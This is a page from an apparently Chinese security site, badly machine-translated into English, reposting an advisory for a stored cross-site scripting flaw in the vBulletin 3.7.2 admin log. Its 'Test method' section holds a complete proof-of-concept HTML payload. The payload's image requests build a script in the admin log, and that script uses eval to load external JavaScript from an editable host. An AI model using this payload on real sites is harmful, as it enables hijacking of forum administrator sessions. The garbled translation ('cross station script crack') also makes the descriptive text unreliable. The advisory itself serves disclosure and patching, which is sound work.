Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > System crack > Content
Hot Articles
GeoVision Digital Video
Adobe Acrobat and the Re
Samba group_mapping.tdb/
The Sleuth Kit - UNIX-ba
Marvell 88W8361P-BEM1 ch
CS-Cart core / user.php
phpBB Small ShoutBox mod
Outlook Web Access for E
FlexCell Grid ActiveX co
PHP error_log bypasses t
Apple Bonjour for Window
nginx file type error pa
DedeCMS V5.5 Final GetWe
Details of PHP code exec
The VMware 2008-0014 ren
Recommend Articles
Mozilla the Firefox 2.0.
DC++ many long-distance
VLC the media player WAV
The Wireshark 1.0.1 edit
Wordpress XML-RPC connec
ServerView Web connectio
PCRE the pcre_compile.c
phpMyAdmin long-distance
Panda the ActiveScan lon
BlueZ the SDP load handl
1024 CMS many documents
WeFi journal file local
vBulletin adminlog.php r
Microsoft Windows DNS se
Adobe RoboHelp Server he
New Articles
DiY - brief loophole ana
Freefloat FTP Server ove
I can with Apache endeav
HP - UX NFS/ONCplus unkn
HP - UX FTPD remote deni
HP - UX DCE can send acr
HP - UX 'useradd' local
HP - UX swagentd remote
HP - UX Numbers local de
HP - UX System under the
HP - UX 'FTPD' unknown r
HP TCP/IP Services for c
From Solaris NFS pages f
From Solaris XScreenSave
Sun Solaris Auditing Ext
vBulletin adminlog.php requested that record HTML pours into the crack
  Add date: 07/14/2008   Publishing date: 07/14/2008   Hits: 223

Issues the date: 2008-07-08
Renewal date: 2008-07-09

Is affected the system:
VBulletin VBulletin 3.7.2
VBulletin VBulletin 3.6.10 PL2
Not affected system:
VBulletin VBulletin 3.7.2 PL1
VBulletin VBulletin 3.6.10 PL3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30134

vBulletin is a section of open source code PHP forum procedure.

the vBulletin supervisory control kneading board's diary examined that the page has the cross station script crack. If the user requested when flaw page, will be managing the region foundation diary, but will not have the filtration to inspect this diary the input. The script name is obtains from basename(PHP_SELF), the operation is ['do'] obtains from _REQUEST, these two ways possibly cause the cross station script attack.

<* origin: Jessica Hope (jessicasaulhope@googlemail.com)
 
  Link: http://secunia.com/advisories/30991/
        http://www.vbulletin.com/forum/showthread.php?t=277945
        http://marc.info/?l=bugtraq&m=121553726712934&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

<html>
<body>
<img src= " http://localhost/vB/upload/admincp/faq.php/0?do= <script>/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22 <script'/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/* "/>
<! --edit to match your data -->
<img src= " http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js ></scrip'/* "/>
<! -- end edit -->
<img src= " http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't >%22) '/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/* "/>
<img src= " http://localhost/vB/upload/admincp/faq.php/a0?do=*/ </script> "/>
</body>
</html>

Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:

VBulletin
---------
At present the manufacturer had already issued the promotion patch repairs this security problem, welcome to manufacturer main page downloading
Prev:WeFi journal file local information revelation crack Next:Microsoft Windows DNS server buffer poison crack (MS08-037)

Comment:

Category: Home > System crack
Home